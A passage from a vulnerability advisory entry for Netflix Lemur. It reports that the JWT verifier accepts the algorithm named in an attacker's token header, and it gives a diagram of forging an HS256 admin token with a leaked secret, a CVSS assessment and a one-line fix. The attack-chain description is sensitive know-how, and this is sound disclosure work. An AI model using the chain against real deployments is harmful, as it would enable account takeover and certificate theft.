backup leak\"\n Disclosure--\u003e\u003eAttacker: \"LEMUR_TOKEN_SECRET value\"\n\n Note over Attacker,Lemur: \"Forge HS256 admin token with leaked secret\"\n Attacker-\u003e\u003eLemur: \"Bearer alg=HS256 admin token signed with leaked secret\"\n Lemur-\u003e\u003eLemur: \"algorithms=[HS256] (taken from header) \u2014 accepted\"\n Lemur--\u003e\u003eAttacker: \"200 OK, role=admin\"\n\n Note over Audit: \"alg=HS256 in audit log - no anomaly flag because attacker picks alg\"\n```\n\n\u003ch2 data-heading=\"Impact Assessment\"\u003eImpact Assessment\u003c/h2\u003e\n\u003cp\u003eToday, in a fully-patched Lemur 1.9.0 on PyJWT 2.x, the standalone impact is C:L (audit-log surface is attacker-influenced) / I:L (an attacker who controls \u003ccode\u003ealg\u003c/code\u003e can downgrade a future verifier upgrade) / A:N. The vector requires no user interaction \u2014 the attacker just sends a crafted token directly \u2014 but AC:H reflects the real-world conditions that have to align (PyJWT version, future migration to asymmetric signing, or a separate disclosure issue) before standalone impact materializes. That\u0027s the 4.8 MEDIUM score. The chain step to single-request ATO depends on a separate disclosure issue, which I\u0027m not claiming as part of this report.\u003c/p\u003e\n\u003cp\u003eThe reason this is worth fixing now rather than later is that it\u0027s a one-line change with no behavioural risk, and the consequence of leaving it in place is a permanent downgrade vector against any algorithm migration Netflix later decides to do. Lemur\u0027s role in the certificate-signing pipeline makes its session tokens unusually high-value \u2014 anyone who forges a Lemur admin JWT can issue, revoke, and exfiltrate certificates across the org. The Lemur PKI compromise report submitted separately (ACME \u003ccode\u003eacme_url\u003c/code\u003e SSRF + creator IDOR) shows what an admin Lemur identity can do in practice.\u003c/p\u003e\n\u003cp\u003eIf Lemur ever moves to asymmetric signing without fixing this sink, the score moves to CRITICAL on the same day. Fix it now.\u003c/p\u003e\n\u003ch2 data-heading=\"Remediation\"\u003eRemediation\u003c/h2\u003e\n\u003cp\u003eOne-line server pin:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003e# lemur/lemur/auth/service.py:130-137\nallowed_algs = current_app.config.get(\"JWT_ALGORITHMS\", [\"HS256\"])\ntry:\n payload = decode_with_multiple_secrets(\n token, token_secrets, algorithms=allowed_algs\n )\nexcept jwt.DecodeError:\n return dict(message=\"Token is invalid\"), 403\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThree follow-ups worth doing at the same time:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eLog the algorithm the server actually applied, separately from the algorithm in the token header.\u003c/strong\u003e This lets audit tooling see \"the server enforced HS256 and the token claimed HS256\" or, post-fix, \"the server enforced RS256 and the token claimed HS256 \u2014 rejected\", and flag mismatches.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePin \u003ccode\u003ealgorithms\u003c/code\u003e to the smallest possible set.\u003c/strong\u003e If Lemur only ever issues HS256, accept only HS256. Don\u0027t list every supported algorithm just because the library supports it.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMigrate to asymmetric signing in a separate hardening PR\u003c/strong\u003e once the algorithm pin is in. RS256 with key rotation removes the \"leaked secret = forge admin\" chain entirely.\u003c/li\u003e\n\u003c/ol\u003e",
"id": "PYSEC-2026-2589",
"modified": "2026-07-13T16:04:34.827314Z",
"published": "2026-07-13T15:46:24.366281Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Netflix/lemur/security/advisories/GHSA-r9gp-7f88-9r54"
},
{
"type": "PACKAGE",
"url": "https://github.com/Netflix/lemur"
},
{
"type": "WEB",
"url": "https://github.com/Netflix/lemur/releases/tag/v1.9.2"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/lemur"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-r9gp-7f88-9r54"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55165"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": " Lemur: JWT verifier honors attacker-supplied alg, enabling ATO"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.